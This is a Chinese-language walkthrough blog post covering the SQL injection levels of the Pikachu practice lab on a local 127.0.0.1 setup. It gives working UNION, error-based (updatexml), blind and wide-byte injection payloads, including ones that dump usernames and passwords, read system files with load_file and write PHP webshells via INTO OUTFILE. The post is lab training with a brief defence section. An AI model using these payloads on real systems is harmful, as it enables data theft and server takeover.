皮卡丘SQL注入汇总

news2025/3/12 9:27:23

1.Sql Inject(SQL注入)概述

SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击

Sql 注入产生原因:

当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。
这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。

Sql 注入带来的威胁主要有如下几点:

猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。
绕过认证,列如绕过验证登录网站后台。
注入可以借助数据库的存储过程进行提权等操作

在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

2.数字型注入(post)

看题目,我们先选择查询id为1的用户

我们查看上方url,发现没有传参,说明其实post类型

这种时刻就该把bp请出来了,我们进行抓包

果然是post传参,将其发送到Repeater

找列数:id=1 order by n# &submit=%E6%9F%A5%E8%AF%A2,n为猜测的列数,如果猜测的列数大于select语句查询的结果的列数,会返回报错

比如,n为5时,就会报错。经过测试,列数为2

爆库:id=1 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2

爆表:id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆列:id=1 union select group_concat(column_name),2 from information_schema.columns where  table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2

爆数据:id=1 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2

读文件 :id=1 union select load_file('C:/Windows/win.ini'),1 from users#&submit=%E6%9F%A5%E8%AF%A2

写马:id=1 union select 1,'<?php assert($_POST[1]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/1.php'#&submit=%E6%9F%A5%E8%AF%A2

这里就不一一演示了嘿嘿

然后我们猜测sql语句为

select 字段1,字段2 from 表名 where id=1

我们再试试id=1 or 1=1&submit=%E6%9F%A5%E8%AF%A2,将其改为

select 字段1,字段2 from 表名 where id=1 or 1=1

上面其他语句也是同样的原理

在id=1后加上or 1=1试试

由此将所有用户信息显示出来! 

3.字符型注入(get)

看题目,我们输入kobe 

看上面url有显示,开始进行sql注入步骤:

查看源码,要用'来闭合

找列数:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by n%23&submit=%E6%9F%A5%E8%AF%A2

n为猜测的列数,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径根据自己搭建皮卡丘时的路径而定

原理和上一关一样,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。

如,我们访问http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by 5%23&submit=%E6%9F%A5%E8%AF%A2,就会报错

最终发现查询结果列数为2

爆库:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,database()%23&submit=%E6%9F%A5%E8%AF%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23&submit=%E6%9F%A5%E8%AF%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'%23&submit=%E6%9F%A5%E8%AF%A2

爆数据:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,load_file('C:/Windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,'<?php assert($_POST[2]); ?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/2.php'%23&submit=%E6%9F%A5%E8%AF%A2

这里还是不演示了,就是这么个道理!

我们同样猜测此sql语句为:

select 字段1,字段2 from 表名 where username = 'kobe';

同样将它改为(用一个单引号将前面的单引号闭合):

select 字段1,字段2 from 表名 where username = 'kobe' or 1=1#';

输入:kobe' or 1=1#试试

同样将所有用户的信息显示出来!

4.搜索型注入

看题目说可以输入名字的一部分

我们只输个“k”,网页返回所有带k的,且上面同样有url显示 

所以一些sql注入语句(找列数、爆库、爆表啥的),还是老套路

查看源码,这次用%'来闭合 

找列数:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' order by n%23&submit=%E6%90%9C%E7%B4%A2

n仍为猜测的列数,同样,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径还是根据自己搭建皮卡丘时的路径而定

本次发现查询结果列数为3

爆库:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select database(),2,3%23&submit=%E6%90%9C%E7%B4%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()%23&submit=%E6%90%9C%E7%B4%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'%23&submit=%E6%90%9C%E7%B4%A2

爆数据:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select username,password,level from users%23&submit=%E6%90%9C%E7%B4%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,load_file('C:/Windows/win.ini')%23&submit=%E6%90%9C%E7%B4%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,'<?php eval($_POST[3]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/3.php'%23&submit=%E6%90%9C%E7%B4%A2

这此猜测sql语句为:

select from 表名 where username like%k% ';

%代表没有或有多个字符,所以可对含有k的用户进行查询,我们再在改为(用%'来闭合):

select from 表名 where username like%k% ' or 1=1 #%';

输入k% ' or 1=1 #

所有用户的信息显示出来!

5.xx型注入

老样子老样子,输入kobe,发现上面同样有url显示

我们仍需考虑是什么闭合,查看源码发现相较于字符型注入,多了括号,所以这次用')来闭合

找列数:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') order by n%23&submit=%E6%9F%A5%E8%AF%A2

n:猜测的列数,说了无数遍了嗷!

爆库:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select database(),2%23&submit=%E6%9F%A5%E8%AF%A2

爆表:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(distinct table_name),2 from information_schema.columns where table_schema='pikachu'%23&submit=%E6%9F%A5%E8%AF%A2

爆列:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(column_name),2 from information_schema.columns where table_name=0x7573657273%23&submit=%E6%9F%A5%E8%AF%A2

爆内容:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2

读文件:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1, load_file('c:/windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2

写马:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1,'<?php assert($_POST[4]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/4.php'%23&submit=%E6%9F%A5%E8%AF%A2

我们再输入') or 1=1#,同样是用')来闭合

所有用户信息!

6.insert/update注入

本关没有给出账号密码提示,我们点击注册

填好信息后,用bp抓包。从抓包结果看是post型的,除了submit之外有6个参数。

先是update注入,因为你得先注册才能修改信息吧

那就还得先了解一下updatexml()函数的用法:

语法:updatexml(xml document, XPathing, new_value)

第一个参数:XML_document是String格式,为XML文档对象的名称,也就是表中的字段名

第二个参数:XPath_string (Xpath格式的字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

那么怎么破解呢?跟上几关的思路不一样,本关是写一个报错注入,再报错回显时将我们想要得信息显示出来

回到注册界面,在用户栏写如下代码(注意闭合):

' or updatexml(1, concat(0x7e, database()), 0) or '

密码那些随便写,提交后得到以下界面

看起来是个报错,其实已经回显了数据库名

同理可以把database()改为其他函数来获得更多数据库信息

insert注入

我们注册好一个用户666并登录

点击修改个人信息,再在性别一栏输入刚才的代码:

' or updatexml(1, concat(0x7e, database()), 0) or '

提交后同样得到了数据库名

其他的爆表爆列啥的,就不写了哈

7.delete注入

随便输入一条留言666

再点击删除,同时用bp抓包,发现其是GET传参

send to repeater

之后在id=后输入如下代码将其闭合

1 or updatexml(1, concat(0x7e, database()), 0)

再将此段代码转换为特殊字符的url编码

改完后就是这个样子

最后send,就得到了数据库名(和上题一样,还是以报错的形式)

8."http header"注入

首先来了解一下什么是"http header"注入

有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证), 或者通过http header头信息获取客户端的一些资料,比如useragent、accept字段等,会对客户端的http header信息进行获取并使用SQL进行处理, 如果此时没有足够的安全考虑则可能会导致基于http header的SQL注入漏洞。

接下来看题目,按提示,我们用admin登录

刷新一下并用bp抓包

可以发现由上文提到的user agent 

send to Repeater后,再修改user agent ,如下

' or updatexml(1,concat(0x7e, database()), 0) or '

最后send,成功得到数据库名(仍以报错的方式) 

9.盲注(base on boolian布尔类型)

首先了解下盲注的概念

(1)盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。

通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。

(2)盲注又分为布尔类型和时间类型

什么情况下使用布尔类型的盲注?

**没有返回SQL执行的错误信息

**错误与正确的输入,返回的结果只有两种

什么情况下使用时间类型的盲注?

**页面上没有显示位和SQL语句执行的错误信息,正确执行和错误执行的返回界面一样,此时需要使用时间类型的盲注。

时间型盲注与布尔型盲注的语句构造过程类似,通常在布尔型盲注表达式的基础上使用IF语句加入延时语句来构造,由于时间型盲注耗时较大,通常利用脚本工具来执行,在手工利用的过程中较少使用。

接下来看题,本题为布尔类型

我们输入kobe' or 1=1#

再试试kobe' or 1=2#

可见,只有我们输入的条件为真时,才能输出正确信息

这次我们输入kobe' and length(database())=1#,显示您输入的username不存在.......

再把1换成2,以此类推,发现=7的时候,输出了正确信息

那么,我们就知道了数据库长度为7,同理,更换其他函数来测试其他数据

10.盲注(based on time)

本题就是基于时间类型的盲注了,题目不告诉你了嘛

上面说了,此种类型适用于无论输入是否正确,都返回相同数据,我们无法判断自己输入的条件是否为真,所以在后面加了一个时间限制

先向上题那样,输入kobe' and length(database())=7#

试试其他语句,我们发现 ,无论输入什么,回显的都是这句话

所以,我们这时就可以使用时间盲注了

输入kobe' and if(length(database())=7, sleep(1),5)#

意思为:若length(database())=7正确,延迟1秒返回:若不正确,延迟5秒返回

我们去测试,发现返回的虽然都是那句I don't care who you are!

但条件正确和不正确的回显时间不同,以此来判断哪个是正确条件

11.宽字节注入

还是先了解一下宽字节的原理

先了解一下什么是窄、宽字节已经常见宽字节编码:

**当某字符的大小为一个字节时,称其字符为窄字节.

**当某字符的大小为两个字节时,称其字符为宽字节.

**所有英文默认占一个字节,汉字占两个字节

**常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等

宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为’,其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。

接下来看题,我们随便输入一个用户123,用bp抓包发现其是post类型的

再send to Repeater

然后将name修改为如下代码(注意f后面有个单引号)

1%df' union select 1,2#

最后send一下,成功得到我们想要的信息!

终于写完了啊啊啊啊!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/606864.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

循环控制语句

文章目录 1.break——跳出循环1.1作用 2.continue——控制循环2.1作用 3.猜数字4.while语句4.1while语句的结构4.2算1-10求和&#xff1a;4.3使用while方式批量添加5个用户给这五个用户添加密码&#xff1a; 5.until语句6.拓展6.1 购物6.2shell 计算器实现加减乘除和取余6.3打印…

chatgpt赋能python:Python反转输出正整数-让计算更简单

Python反转输出正整数-让计算更简单 Python是一种高级编程语言&#xff0c;除了可以完成各种任务&#xff0c;还可以反转输出正整数。在本篇SEO文章中&#xff0c;我将介绍如何使用Python编程语言反转输出正整数&#xff0c;并且展现了这个方法是如何简化计算。 什么是Python…

chatgpt赋能python:Python列表指定元素的取出方法

Python列表指定元素的取出方法 在Python编程中&#xff0c;经常需要取出列表中的指定元素。本文将介绍几种常用的取出列表指定元素的方法。 1. 使用索引 列表中的元素可以通过索引来进行访问和修改&#xff0c;索引从0开始。下面的示例展示了如何使用索引来取出列表中的指定…

六、docker安装ngxin部署若以前端

1.第一次安装&#xff0c;不进行挂载数据卷&#xff0c; docker run \ -p 8060:80 \ --name nginx \ --privilegedtrue \ --restartalways \ -d nginx:1.17.82. 将配置信息复制到宿主机本地 # 将容器nginx.conf文件复制到宿主机 docker cp nginx:/etc/nginx/nginx.conf /data…

总投资300亿,南山前海南山村旧改城市更新

南山村 项目位于南山区南山街道南山村旧村片区&#xff0c;东临南新路&#xff0c;南临东滨路&#xff0c;西临前海路&#xff0c;北临南园村。地处联系前海、后海两大中心区的空间发展轴带上&#xff0c;区位交通条件优越。位于9号线延长线前海路站附近&#xff0c;也因地处大…

背包问题总结篇

背包问题总结篇 关于这几种常见的背包&#xff0c;其关系如下&#xff1a; 通过这个图&#xff0c;可以很清晰分清这几种常见背包之间的关系。 在讲解背包问题的时候&#xff0c;我们都是按照如下五部来逐步分析&#xff0c;相信大家也体会到&#xff0c;把这五部都搞透了&…

【C++刷题】【动态规划篇】(一)

动态规划篇&#xff08;一&#xff09; 一、1137. 第 N 个泰波那契数&#xff08;easy&#xff09;二、三步问题&#xff08;easy&#xff09;三、使用最小花费爬楼梯&#xff08;easy&#xff09;四、解码方法&#xff08;medium&#xff09;五、不同路径&#xff08;medium&a…

如何利用地面控制点实现倾斜摄影三维模型数据的几何坐标变换和纠正?

如何利用地面控制点实现倾斜摄影三维模型数据的几何坐标变换和纠正&#xff1f; 倾斜摄影是一种在空中拍摄地表物体的技术&#xff0c;可以获得高分辨率、高精度的三维模型数据&#xff0c;广泛应用于城市规划、建筑设计、土地管理等领域。然而&#xff0c;由于航拍时无法避免姿…

ClassLoader源码

介绍 ClassLoader 顾名思义就是类加载器 ClassLoader 是一个抽象类 没有父类 作用 1.负责将 Class 加载到 JVM 中 2.审查每个类由谁加载&#xff08;父优先的等级加载机制&#xff09; 3.将 Class 字节码重新解析成 JVM 统一要求的对象格式 常量&变量 //注册本地方法…

chatgpt赋能python:Python实现动态排名:在SEO游戏中的使用

Python实现动态排名&#xff1a;在SEO游戏中的使用 搜索引擎优化&#xff08;SEO&#xff09;是一项必不可少的活动&#xff0c;可以提高网站在搜索结果中的排名和流量。其中之一是动态排名&#xff0c;它可以根据网站相应信息的变化而自动更新排名&#xff0c;使网站始终保持…

chatgpt赋能python:Python技巧:如何用Python去除文本中的头和尾

Python技巧&#xff1a;如何用Python去除文本中的头和尾 在任何文本处理任务中&#xff0c;去除文本数据的头和尾是非常常见的需求。这在搜索引擎优化&#xff08;SEO&#xff09;中尤其重要&#xff0c;因为头和尾中可能包含重复的内容&#xff0c;这会降低网页的排名。在这篇…

翻筋斗觅食海鸥优化算法-附代码

翻筋斗觅食海鸥优化算法 文章目录 翻筋斗觅食海鸥优化算法1.海鸥优化算法2. 改进海鸥优化算法2.1 非线性参数 &#xff21; 策略2.2 翻筋斗觅食策略 3.实验结果4.参考文献5.Matlab代码6.python代码 摘要&#xff1a;针对基本海鸥优化算法(SOA)在处理复杂优化问题中存在低精度、…

Linux会替代Windows吗?

Windows用户们&#xff0c;去还是留&#xff1f; Windows 依然是高居榜首的桌面操作系统&#xff0c;占据 90% 以上的市场份额&#xff0c;远超 macOS 和 Linux 。 从数据来看&#xff0c;尽管 linux 并不是 Windows 的头号接班人&#xff0c;但近几年越来越多用户转向 Ubunt…

Vue嵌套表单的 Dialog精美模板分享

文章目录 &#x1f412;个人主页&#x1f3c5;Vue项目常用组件模板仓库&#x1f4d6;前言&#xff1a;&#x1f380;源码如下&#xff1a; &#x1f412;个人主页 &#x1f3c5;Vue项目常用组件模板仓库 &#x1f4d6;前言&#xff1a; 本篇博客主要提供vue组件之嵌套表单的 D…

通用权限管理系统+vue3项目实战(一)

1.创建项目 在某个工程文件夹下创建项目 npm init vuelatest各种工具选择都选是&#xff0c;并且安装环境node_modules之后&#xff0c;显示如图&#xff1a; 1.1 引入element-plus 在vue2的时候常用的ui框架是element-ui&#xff0c;在vue3时应该使用它的继承者element-p…

chatgpt赋能python:Python匹配空白字符的完整指南

Python匹配空白字符的完整指南 在Python编程中&#xff0c;处理文本数据是一项常见任务。当我们需要从文本中提取数据时&#xff0c;通常需要从字符串中匹配特定的模式。这些模式可能包括空格、制表符和换行符等空白字符。本文将介绍如何使用Python正则表达式来匹配空白字符&a…

chatgpt赋能python:Python动态Import简介

Python动态Import简介 在Python中&#xff0c;Import语句用于导入其他Python模块中的函数和变量。通常在Python编程中&#xff0c;我们使用静态Import方法来导入模块。但是&#xff0c;Python也支持动态Import&#xff0c;即在运行时根据需要导入模块中的函数和变量。 在本文…

day 39:62. 不同路径63. 不同路径 II

动态规划 [62. 不同路径](https://leetcode.cn/problems/unique-paths/description/)1. dp数组以及下标名义2. 递归公式3. dp数组如何初始化4. 遍历顺序5.代码 [63. 不同路径 II&#xff1a;有障碍物](https://leetcode.cn/problems/unique-paths-ii/description/)1. dp数组以及…

银行从业——法律法规——经济基础知识

第一章、经济基础知识 第一节、宏观经济分析 【 知识点1】 宏观经济发展目标 宏观经济发展的总体目标一般包括四个&#xff1a; 宏观经济发展的总体目标 衡量指标1、经济增长国内生产总值&#xff08;GDP&#xff09;2、充分就业 失业率3、物价稳定通货膨胀率4、国际…

【HISI IC萌新虚拟项目】Package Process Unit项目全流程目录

说明 Package Process Unit虚拟项目是HISI部分部门芯片设计与验证新员工的培训项目,一般会分配6~10周的时间独立开发该项目并完成验收。在整个项目中,新员工需要熟悉工作站、项目流程、公共环境与代码等,并根据方案文档独立设计ppu模块,之后进行功能验证与综合等芯片交付流…